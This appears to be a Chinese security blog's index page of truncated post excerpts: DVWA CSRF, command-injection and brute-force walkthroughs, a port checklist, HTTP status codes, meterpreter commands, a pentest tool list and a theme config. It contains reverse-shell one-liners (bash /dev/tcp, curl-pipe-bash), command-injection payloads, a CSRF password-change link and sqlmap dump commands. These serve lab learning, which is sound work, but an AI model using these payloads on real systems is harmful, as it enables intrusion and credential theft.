DVWA-CSRF
Vulnerability: Cross Site Request Forgery (CSRF)
csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。
low
这里的密码检测是直接将输入的进行拼接,检验password_new与password_conf是否一致。于是可以先伪造一个简陋的链接
1http://192.168.169.233/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
这样我们就成功地将密码更改为password了
上面的链接注意改成自己的ip 和 路径
Medium
写一个html
123<img src="192.168.169.233/dvwa/vulnerabilities/csrf/?password_new=test&password_ ...
DVWA-Command Injection
Vulnerability: Command Injection
根据程序调用系统命令。
low1234一、输入:127.0.0.1 && ipconfigipconfig命令是DOS系统中的命令,可以帮助用户查看网络状况,可以看到你想看到的众多网络信息,比如延迟,IP,主机信息,物理地址信息等等。二、输入:127.0.0.1 && whoami
Medium
同样的命令报错
可能是这里&&被过滤了,那我们就试一下其它的连接方法。
12 || whoami
输入:12&whoami 成功获得账户
源码
High
源码
更多过滤
不过还是有漏洞比如:输入:12222222 |whoami中间不加空格成功获得账户
Impossible
默认账户密码
转载:https://mp.weixin.qq.com/s/o2AVkr9jP11KyDpamPUa7A
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185 ...
重要端口服务
重要端口及服务
port
service
description
21
FTP
FTP控制端口,检查匿名登录、弱口令
22
SSH
SSH远程登录协议,检查弱口令
23
Telnet
Telnet终端仿真协议
25
SMTP
简单邮件传输协议
53
DNS服务
80
Web
检查常见Web漏洞及管理后台
110
POP3
邮局协议
111
NFS
网络文件系统
389
LDAP
轻型目录访问协议,检查是否存在匿名访问
443
OpenSSL
检查心脏滴血及Web漏洞
445
SMB
检查是否存在MS17-010、MS08-067漏洞
512
Rexec
检查远程shell命令及暴力破解
873
Rsync
检查匿名登录、弱口令
1433
SQL Server
SQL Server数据库服务
1521
Oracle
Oracle数据库服务
2049
NFS
NFS未授权访问
2181
Zookeeper
分布式协调系统
2375
Docker Remote
API未授权访问
3306
MySQL
MySQ ...
HTTP状态码
100 Continue 这个临时响应表明,迄今为止的所有内容都是可行的,客户端应该继续请求,如果已经完成,则忽略它。
101 Switching Protocol 该代码是响应客户端的 Upgrade (en-US) 标头发送的,并且指示服务器也正在切换的协议。
102 Processing (WebDAV) 此代码表示服务器已收到并正在处理该请求,但没有响应可用。
103 Early Hints 此状态代码主要用于与Link 链接头一起使用,以允许用户代理在服务器仍在准备响应时开始预加载资源。
200 OK 请求成功。成功的含义取决于HTTP方法。GET:资源已被提取并在消息正文中传输。HEAD:实体标头位于消息正文中。POST:描述动作结果的资源在消息体中传输。TRACE:消息正文包含服务器收到的请求消息。
201 Created 该请求已成功,并因此创建了一个新的资源。这通常是在POST请求,或是某些PUT请求之后返回的响应。
202 Accepted 请求已经接收到,但还未响应,没有结果。意味着不会有一个异步的响应去表明当前请求的结果,预期另外的进程和服务去处理请求,或者批处 ...
反弹shell
反弹shell常用反弹shell方式如下(bash/curl/http),其他反弹shell方式参考:Click Here
bash1bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
curl攻击方:
12cat bash.html/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
被控端:
1curl 192.168.35.152/bash.html|bash
http攻击方:
编写shell脚本并启动http服务器
123echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.shpython2环境下:python -m SimpleHTTPServer 80python3环境下:python -m http.server 80
被控端:
1234# 上传shell.sh文件wget 192.16 ...
meterpreter会话渗透利用常用命令归纳小结
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。
https://www.cnblogs.com/ssooking/p/6192995.html
run vnc 无法操作的远程桌面
常用的32个命令归纳小结1、background命令返回,把meterpreter后台挂起
2、session命令session 命令可以查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
3、shell命令获取目标主机的远程命令行shell
如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试
4、cat命令查看目标主机上的文档内容
例如:cat C:\\boot.ini 查看目标主机启动引导信息
5、getwd命令获取系统工作的当前目录
6、upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload setup.exe C:\\windows\\system32\
7、download命令把目标主机上的文件下载到我们的攻击主机 ...
github渗透测试工具库
github渗透测试工具库
www.cnblogs.com
漏洞练习平台WebGoat漏洞练习平台:https://github.com/WebGoat/WebGoat
webgoat-legacy漏洞练习平台:https://github.com/WebGoat/WebGoat-Legacy
zvuldirll漏洞练习平台:https://github.com/710leo/ZVulDrill
vulapps漏洞练习平台:https://github.com/Medicean/VulApps
dvwa漏洞练习平台:https://github.com/RandomStorm/DVWA
数据库注入练习平台 :https://github.com/Audi-1/sqli-labs
用node编写的漏洞练习平台,like OWASP Node Goat:https://github.com/cr0hn/vulnerable-node
Ruby编写的一款工具,生成含漏洞的虚拟机:https://github.com/cliffe/secgen
花式扫描器Nmap端口扫描器:https://g ...
DVWA-Brute Force
Brute ForceLowbp抓包暴力破解
略
sqlmap
bp抓包
保存成文档
开跑
1234qlmap -r dc9.txt --dbssqlmap -r dc9.txt -D dvwa --tablessqlmap -r dc9.txt -D dvwa -T users --columnssqlmap -r dc9.txt -D dvwa -T users -C user,password --dump
登录
Medium123与Low难度基本相同,区别是每一次登录失败后会延时2s,别的就没有什么改动了,总体过程影响不大。在low安全级别的基础上,在username和password的GET传参后利用函数做了数据过滤,对数据库中特殊符号进行转义,能够抵御基本的SQL注入用sqlmap也能跑出来
High
有token
bp走一下流程
发送到攻击模块
设置线程数为1
攻击类型
看图片
选项>最下面>选总是(中英对照)
payload 类型改一下(中英对照)
开跑
Impossible1这个 ...
Butterfly侧边栏引入一言
创建card_hitokoto在主题配置文件Butterfly/_config.yml中的侧边栏设置中添加 card_hitokoto: enable: true
aside:
enable: true
mobile: true # display on mobile
position: right # left or right
card_author:
enable: true
description:
button:
icon: fab fa-github
text: Follow Me
link: https://github.com/flipped-1121
card_announcement:
enable: true
content: “My love for <font color=lime>Ni</font> cannot be measured with an <font color=red>int</font>, not ...